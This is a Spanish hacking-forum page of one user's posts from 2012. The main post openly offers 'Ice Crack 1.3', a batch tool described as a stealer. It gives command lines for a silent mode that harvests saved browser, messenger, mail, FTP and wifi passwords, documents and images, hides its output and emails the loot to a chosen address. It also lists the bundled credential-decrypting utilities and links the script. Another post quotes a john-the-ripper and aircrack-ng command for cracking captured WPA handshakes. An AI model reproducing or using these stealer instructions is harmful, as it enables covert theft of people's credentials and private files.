elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 ... 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 [1180] 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 1195 ... 1236
11791  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Dirigido a los adm del foro.... en: 1 Febrero 2012, 20:20 pm
Es buena la idea/propuesta

No me puedo creer que pienses eso Azielito

Sugiero que los administradores del foro hagan un tipo de prueba al querer registrarse una prueba de conocimientos  básicos , o preguntas sobre que quiere aprender o que le gusta o no se los administradores del foro con su experiencia creo que sabrán hacer el formulario ....

Me meto donde no me llaman al contestar aqui, Pero... Es que Un foro está para aprender, Documentarse, Ayudar a los demás, Leer noticias, Tutoriales, Videos, Reirse de los trolls...

Considero una tremenda estupidez realizar una prueba de conocimientos cuando si alguien se registra es para aprender algo o ayudar a los demás.

Es obvio que lo que propones no lo implementará el-admin jamás. Ni aqui ni en ningún foro respetable vamos, Lo que comentas es el trabajo de los moderadores, Ya se esfuerzan lo que pueden para eliminar mensajes de ese tipo, digo yo.

Saludos.
11792  Foros Generales / Sugerencias y dudas sobre el Foro / Re: (solucionado) ¿Cual es el mínimo de caracteres para registrar un nombre de user? en: 1 Febrero 2012, 16:51 pm
Bueno, eehhmm, en realidad hace un par de meses encontré un agujero en smf que se lo comenté a psymera el cual te permite probar todas las contraseñas que quieras evitando el sistema de baneo de smf :P talves hayas encontrado lo mismo y quieres probar, pues suerte! :) y si encuentras algún acceso no dudes contactarte con el admin para que te premie con un viaje a acapulco (la calle acapulco).

¿Ese comment va dirigido a mi?

Te equivocas de persona.

No se nada de estas cosas, y el-brujo lo sabe
No conozco la mayoría de parámetros de programas como el accesdiver o el sentry.

PD: De todas formas, si alguien encontrase una vulnerabilidad...  Creo que un administrador listo en vez de darle un viaje a "acapulco", le daría un puesto en el staff pa encargarse de esos temas.

Saludos.
11793  Programación / Scripting / Re: [Batch] [APORTE] Windows 7 x64 Xtreme Cleaner v3.1 en: 1 Febrero 2012, 16:07 pm
que tan de fiar eres? tu y el script, que garantías me das para que lo ejecute?

xD

Te mando un privado con spam a otras páginas donde he posteado el script para que veas comentarios y juzgues tú mismo como quieras peibol

Si lo vas a usar en un PC x86, garantias no t puedo dar muchas, sé que no te va a borrar más de la cuenta, pero si que podria dar distintos errores o cerrarse de repente el script...

Si lo usas sobre un windows 7 de 64 Bit, las garantias son totales... Solo me cabe mencionar que si usas la opcion que usa el limpiador de CCLEANER, este está configurado para borrar muchas cookies, deberías abrir el ccleaner 1 vez y configurarlo a tu gusto para tener ya garantias 100% de que va a hacer solamente lo que quieres que haga.
Y como bien pone en el post principal, no me hago responsable del uso del wiseregcleaner (Que viene desactivado por defecto) porque si ese programa tiene un bug y te borra una clave de registro que no debería borrar, pues no es mi culpa, pero una cosa si digo, a mi me funciona muy bien y la tengo activada siempre xD.

No se te va a estropear el PC peibol

Pruebalo y comentas

Un saludo!


EDITO:

No lleva virus

El post tiene +1.700 visitas, digo yo que al menos de 50 a 100 personas lo habrán testeado, y alguno habria dicho si tiene virus xD

Aqui te dejo un scan de virustotal, no puedo hacer más:


Si te fijas bien, lo detectan 5, por la utilidad cmdow.exe (Sirve para ocultar ventanas, hide windows, o cerrarlas), en la página oficial de esta app pone que es un falso positivo, y lo es, Esto tambien pasaba con la utilidad "nircmd.exe" hace años

Y es más, si quieres borrar el cmdow.exe... No es necesaria para el script (A menos que uses la opcion de usar el limpiador de windows, necesito usar cmdow.exe para cerrar la ventana del limpiador)


Citar

SHA256:    d6386099a791c1cccf4a0e8ba0fa7895f2987ee200b280d7a5d402a057d01996
Nombre:    Windows 7 Xtreme Cleaner v3.1 By PiToLoKo.exe
Detecciones:    5 / 43
Fecha de análisis:    2012-02-01 15:25:35 UTC ( hace 6 minutos )


Antivirus    Resultado    Actualización
AhnLab-V3    -    20120131
AntiVir    -    20120201
Antiy-AVL    -    20120131
Avast    -    20120201
AVG    -    20120201
BitDefender    -    20120201
ByteHero    -    20120126
CAT-QuickHeal    -    20120131
ClamAV    PUA.Tool.Hidewindows-1    20120201
Commtouch    W32/Hidewnd.D    20120201
Comodo    -    20120201
DrWeb    -    20120201
Emsisoft    -    20120201
eSafe    -    20120130
eTrust-Vet    -    20120201
F-Prot    W32/Hidewnd.D    20120201
F-Secure    -    20120201
Fortinet    -    20120201
GData    -    20120201
Ikarus    -    20120201
Jiangmin    -    20120201
K7AntiVirus    Unwanted-Program    20120131
Kaspersky    -    20120201
McAfee    -    20120201
McAfee-GW-Edition    -    20120201
Microsoft    -    20120201
NOD32    -    20120201
Norman    -    20120201
nProtect    -    20120201
Panda    -    20120131
PCTools    -    20120201
Prevx    -    20120201
Rising    -    20120118
Sophos    Cmdow    20120201
SUPERAntiSpyware    -    20120201
Symantec    -    20120201
TheHacker    -    20120131
TrendMicro    -    20120201
TrendMicro-HouseCall    -    20120201
VBA32    -    20120131
VIPRE    -    20120201
ViRobot    -    20120201
VirusBuster    -    20120201
11794  Foros Generales / Dudas Generales / Re: diccionario wpa en: 1 Febrero 2012, 14:36 pm
¿ ALGUIEN ME PODRIA MANDARME UN LINK PARA SACAR ESE DICCIONARIO, Y COMO USARLO DENTRO DE el wifiway ?

Usa el buscador del foro.

Link-> guia_completa_aircrackng

Saludos
11795  Programación / Scripting / Re: [Batch] Ice Crack (Crakea archivos comprimidos,PDF,Y Recupera contraseñas de...) en: 1 Febrero 2012, 14:28 pm
Valió la pena darte la info del QPDF.

XDDDDDDDDDDDDDD

Gracias!



Enlace de descarga correjido!

Puse sin querer el "unrar.exe" de 64 bit.

( Unrar.exe correjido, Versión de 32 Bit )

v 1.1
-----

El script detecta si usa 64 bit o 32 bit, para usar las utilidades x64 o x86.  (El 7zip de 64 bit lo he descartado, no funciona a pesar de escribir bien la contraseña, debe ser un bug)

Eliminado los formatos a crackear: bzip2, gzip, tar, wim, y XZ, pues todos estos no pueden contener una contraseña, Lo siento por el despiste.

Correjido una errata en una variable, al usar la opcion "8" "Recuperar todas las contraseñas posibles", Ahora se guardan las contraseñas en el escritorio.


Saludos
11796  Programación / Scripting / [Batch] Ice Crack 1.3 (Stealer y craqueador de archivos) en: 1 Febrero 2012, 09:48 am
NUEVA VERSIÓN 1.3, SCRIPT ACTUALIZADO! 20/07/2012
Muchas mejoras!
La lista de cambios la tienen abajo :)



Ice Crack tiene varias funciones:
1º - Crackeador de archivos por fuerza bruta muy sencillo de usar. Puede usar conbinaciones al vuelo, o diccionarios generados.
2º - Recuperar (O robar, Eso lo decides tú) contraseñas del PC. Se pueden recuperar contraseñas guardadas del navegador, o en el Messenger, o del wifi, además de ciertos productos de Microsoft.
3º - Recuperar (O robar, Eso lo decides tú) archivos del PC. Puede recuperar todas los documentos de texto e imagenes de un pc, Con la posibilidad de mandarlo todo automáticamente a un correo email de destino.

Todo eso NO lo he hecho yo solo, Me he servido de ayuda de distintas utilidades commandline, Las cuales están todas adentro del archivo comprimido.

Solo tengo mérito de haberlo adaptado todo en un solo archivo, Un sencillo script.


( Versión 1.3 )




Código:
.___                 _________                       __          .------,  
|   | ____  ____     \_   ___ \____________    ____ |  | __    ,'_____,'|
|   |/ ___\/ __ \    /    \  \/\_  __ \__  \ _/ ___\|  |/ /    |    //| |
|   \  \__\  ___/    \     \____|  | \// __ \\  \___|    <     |      | |
|___|\___  >___  >    \______  /|__|  (____  /\___  >__|_ \    | //   | ;
         \/    \/            \/            \/     \/     \/    |______|'._
                                                               `   ._     `;
                                                                     `-._.''

By Elektro H@cker



v1.3
----

Nuevas funciones y opciones:

- Agregado un menú de ayuda.

- Agregada opción para recuperar información básica acerca del PC.

- Agregada opción para recuperar información avanzada acerca del PC.

- Agregara opción para genera un arbol del listado de carpetas y archivos del disco duro.

- Agregada opción para recuperar archivos de documentos del PC, Con posibilidad de enviarlos por email.

- Agregada opción para recuperar archivos de imagenes del PC, Con posibilidad de enviarlos por email.

- Agregada opción para recuperar otros archivos de "X formato" del PC, Con posibilidad de enviarlos por email.

NOTAS SOBRE LAS OPCIONES DE RECUPERAR ARCHIVOS:

  Recupera todos los archivos de documento del disco duro:
  (txt,doc,docx,pdf,rtf,log,odt,bat,cmd,py,rb,htm,html,xml)

  Recupera todos los archivos de imagen del disco duro:
  (bmp,jpg,jpeg,png,gif,ico,tif,tiff)

  Los archivos robados/recuperados se pueden comprimir automáticamente en formato 7zip en partes de 100 MB, Y se pueden enviar a CUALQUIER correo de email directamente desde IceCrack.

- Se han modificado los parámetros del modo silencioso, Ahora se deben usar así:

  (¡ESTOS PARÁMETROS SOLO SON UTILIZABLES DIRECTAMENTE EN EL SCRIPT, NO EN EL EXE DE WINRAR!)

Código:
/silent info
Recupera toda la información acerca del PC.

Código:
/silent info email:TUEMAIL@hotmail.com
Recupera toda la información acerca del PC, y la envia por email.

Código:
/silent files
Recupera todos los archivos de documentos e imagenes.
Código:
/silent files email:TUEMAIL@hotmail.com
Recupera todos los archivos de documentos e imagenes, y las envia por email.

Código:
/silent pass
Recupera todas las contraseñas e información del PC.

Código:
/silent pass email:TUEMAIL@hotmail.com
Recupera todas las contraseñas e información del PC, y las envia por email.

Código:
/silent
Recupera todo lo posible.

Código:
/silent email:TUEMAIL@hotmail.com
Recupera todo lo posible, Y lo envia por email.

Nota:    Para ocultar los mensajes del programa en modo silencioso solo hay que redireccionar la salida de echo usando ">NUL"
Ejemplo:
Código:
 IceCrack.bat /Silent pass email:ELEKTROHACKER@LIVE.COM >NUL


- Se ha agregado la posibilidad de usar los parámetros silenciosos desde el executable de IceCrack.EXE comprimido en WinRAR (¡Ya no hace falta extraer el script en un PC!)

  (¡ESTOS PARÁMETROS SOLO SON UTILIZABLES DESDE EL EXECUTABLE DE WINRAR, NO EN EL SCRIPT!)

En este caso, Hay que usarlo desde la consola de la siguiente manera:

IceCrack.exe -sp" PARÁMETROS" "RUTA DE GUARDADO"

Ejemplo 1:
Código:
IceCrack.exe -sp" /Silent pass ruta:C:\Carpeta"
Ejemplo 2:
Código:
IceCrack.exe -sp" /Silent pass email:TUEMAIL@HOTMAIL.COM ruta:C:\Carpeta"
Ejemplo 3:
Código:
IceCrack.exe -sp" /Silent ruta:%CD%"
Ejemplo 4:
Código:
IceCrack.exe -sp" /Silent email:TUEMAIL@HOTMAIL.COM"

Nota: El orden de las comillas dobles y el espacio es estricto en WinRAR.


-Agregada la utilidad ZetaUploader, Para enviar emails en modo silencioso.

-Actualizadas las version de las siguientes aplicaciones de terceros:
UnRAR (v4.20)

Nota:
Para que no hayan lios, Todos los comandos disponibles son estos:


IceCrack.Bat:
-------------
Código:
icecrack /silent
icecrack /silent ruta:(RUTA)
icecrack /silent email:(EMAIL@...)
icecrack /silent email:(EMAIL@...) ruta:(RUTA)

icecrack /silent info
icecrack /silent info ruta:(RUTA)
icecrack /silent info email:(EMAIL@...)
icecrack /silent info email:(EMAIL@...) ruta:(RUTA)

icecrack /silent pass
icecrack /silent pass ruta:(RUTA)
icecrack /silent pass email:(EMAIL@...)
icecrack /silent pass email:(EMAIL@...) ruta:(RUTA)

icecrack /silent files
icecrack /silent files ruta:(RUTA)
icecrack /silent files email:(EMAIL@...)
icecrack /silent files email:(EMAIL@...) ruta:(RUTA)


IceCrack.Exe:
-------------
Código:
icecrack -sp" /silent"
icecrack -sp" /silent ruta:(RUTA)"
icecrack -sp" /silent email:(EMAIL@...)"
icecrack -sp" /silent email:(EMAIL@...) ruta:(RUTA)"

icecrack -sp" /silent info"
icecrack -sp" /silent info ruta:(RUTA)"
icecrack -sp" /silent info email:(EMAIL@...)"
icecrack -sp" /silent info email:(EMAIL@...) ruta:(RUTA)"

icecrack -sp" /silent pass"
icecrack -sp" /silent pass ruta:(RUTA)"
icecrack -sp" /silent pass email:(EMAIL@...)"
icecrack -sp" /silent pass email:(EMAIL@...) ruta:(RUTA)"

icecrack -sp" /silent files"
icecrack -sp" /silent files ruta:(RUTA)"
icecrack -sp" /silent files email:(EMAIL@...)"
icecrack -sp" /silent files email:(EMAIL@...) ruta:(RUTA)"
v1.2
----

El código se ha reducido 300 lineas.

Corregido un fallo al intentar usar un diccionario

Actualizadas la mayoria de las aplicaciones que usa el script.

IceCrack ahora soporta modo silencioso para usarlo como stealer
Instrucciones:
  • Descomprimir el .exe donde quieras (Usando WinRAR)
  • Ejecutar desde la consola el siguiente comando: Icecrack.cmd steal



v1.1b
-----
Correjido un fallo en el crackeador de contraseñas RAR, Daba error en la primera combinación.



v 1.1
-----

El script detecta si usa 64 bit o 32 bit, para usar las utilidades x64 o x86.  (El 7zip de 64 bit lo he descartado, no funciona a pesar de escribir bien la contraseña, debe ser un bug)

Eliminado los formatos a crackear: bzip2, gzip, tar, wim, y XZ, pues todos estos no pueden contener una contraseña, Lo siento por el despiste.

Correjido una errata en una variable, al usar la opcion "8" "Recuperar todas las contraseñas posibles", Ahora se guardan las contraseñas en el escritorio.




::::::::::::::::::::
:                  :
: CRACKEAR ARCHIVO :
:                  :
::::::::::::::::::::

@ Formatos compatibles

   7z
   pdf
   pst
   rar
   zip


::::::::::::::::::::::::
:                      :
: RECUPERAR CONTRASEÑA :
:                      :
::::::::::::::::::::::::

# Navegadores compatibles:

   Chrome
   Firefox
   Flock
   Internet Explorer
   Opera
   Safari


# Clientes de mensajería instantanea compatibles:

    AIM v6.x - v7.5
    Beyluxe IM
    Digsby IM
    Google Talk
    IMVU
    Meebo Notifier
    Miranda
    MSN Messenger
    MySpaceIM
    Nimbuzz Messenger
    PaltalkScene
    Pidgin (Formerly Gaim)
    Trillian
    Trillian Astra
    Windows Live Messenger
    XFire Game Messenger


# Clientes de correo compatibles:

    Foxmail
    GMail Notifier
    GTalk
    IncrediMail
    Microsoft Outlook 2002/XP/2003/2007/2010
    Microsoft Outlook Express
    Miranda Messenger
    Mozilla Thunderbird
    MSN Messenger
    PaltalkScene IM
    Pidgin (Formerly Gaim) Messenger
    Windows Live Mail
    Windows Live Messenger (including latest version 2011)


# Clientes FTP compatibles:

    Dreamweaver
    FileZilla
    FlashFXP
    FTPCommander
    SmartFTP
    WS_FTP


# Productos de Microsoft compatibles:

    Microsoft Exchange Server 2000
    Microsoft Exchange Server 2003
    Microsoft Office 2000 (Only ProductID is displayed)
    Microsoft Office 2003
    Microsoft Office 2007
    Microsoft Office 2010
    Microsoft SQL Server 2000
    Microsoft SQL Server 2005
    Microsoft Windows 2000
    Microsoft Windows 7 (Works only for some of the Windows 7 versions)
    Microsoft Windows 98/ME
    Microsoft Windows NT
    Microsoft Windows Server 2003
    Microsoft Windows Vista
    Microsoft Windows XP



Los programas de terceros que usa IceCrack son:
-----------------------------------------------
7Zip
BrowserPasswordDecryptor
FtpPasswordDecryptor
MailPasswordDecryptor
MessengerPasswordDecryptor
ProduKey
PstPassword
qpdf
WinRAR
WirelessKeyView
ZetaUploader



Nuevas capturas:
 

 

 



El script (v1.3): http://pastebin.com/H8VjZ3Qh
11797  Informática / Software / Re: Duda sobre emule 0.50a en: 1 Febrero 2012, 06:35 am
OK Goku tienes razón, en el config.ini tampoco hay opción para limitarlo

gracias
11798  Informática / Software / Re: Contraseña de un torrent en: 1 Febrero 2012, 05:30 am
Además creo que el tamaño del archivo no importa

He visto muchos crackers que para testear la contraseña se basan en la descompresion del archivo o en el test de integridad del archivo

Vamos, que por cada combinación, te descomprime casi los 6 GB.

Depende, Si es un solo archivo esos 6 gb, Quiero decir, Si solamente es una .iso que pesa 6 gb, el archivo debe ser descomprimido del todo
De echo la propia utilidad "unrar.exe" de WinRAR necesita descomprimir el archivo entero para testear una contraseña, asi que...


Aunque claro, seguro que un buen cracker usa otro método donde solamente lea unos bytes del archivo RAR y no haga falta descomprimirlo, pero bueno, poquitos serán los que estén bien programados.

Saludos.
11799  Foros Generales / Foro Libre / Re: Lista de cosas que aprender que te hace un usuario MEDIO? en: 31 Enero 2012, 13:48 pm
Si te has visto 50% de los vídeos de la webs eres una maestro.

11800  Programación / Scripting / Re: [Batch] Ice Gen 1.0 (Generador de Wordlist,Combolist,WEP,WPA,Serial,Cookies,IP) en: 31 Enero 2012, 13:26 pm
creo que lo óptimo para este tipo de programas es programar en c.

EDITO: Yo opino lo mismo, si supiera programar en C lo habría hecho xD.

Pero batch tiene su punto de vista bueno, a falta de velocidad, la posibilidad de tener errores (En el código) también disminuye porque es más simple. Yo estaba harto de ver generadores hechos en vb, py, c, y creo que probé uno programado en delphi hace años, todos muy bugeados, hasta que hice uno en batch xDDDDD, que no es gran cosa pero, a mi me complace  :xD.



Quería saber si me puedes ayudar o guiar a crear un diccionario para wpa Orange.

Gracias por comentar

Sobre claves WPA no he experimentado mucho así que intenté documentarme lo mejor posible con ejemplos de otros generadores, e información antes de realizar el script, Y esto es lo que te puedo decir:

Depende de si ese dispositivo wifi acepta solamente claves hex de 64 caracteres, o claves ASCII (máximo 63 caracteres), o ambas.

En el primer caso tendrías que usar la opción (3) > WPA 256 BIT HEX > Secuencia de Ice Gen, y generar el diccionario entero.

En el segundo caso, Buf... Vas a tener que usar la opcion (1) > Diccionario de palabras > ASCII > Longitud: de 2 a 63 > Secuencia (Osea, 61 diccionarios distintos xD), Aunque no es del todo fiable, Faltan algunos caracteres ASCII porque la opción no está pensada para claves WPA ese diccionario, Pero... servir podría servirte.

En el tercer caso (Suponiendo que no sepas si acepta HEX o ASCII), Tendrías que hacer tanto el diccionario Hexadecimal como los ASCII, Para asegurarte.



Pero si tu propósito es crackear una red WPA, Creo que te convendría más usar la suite aircrack-ng (En Windows o Linux) probando claves usando john the ripper.

guia_completa_aircrackng

Cita de: SH4V
Ej:  john --stdout --wordlist=specialrules.lst --rules | aircrack-ng -e test -a 2 -w - /root/capture/wpa.cap



PD: Si me he equivocado en algo corrijanme.

Saludos.
Páginas: 1 ... 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 [1180] 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 1195 ... 1236
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines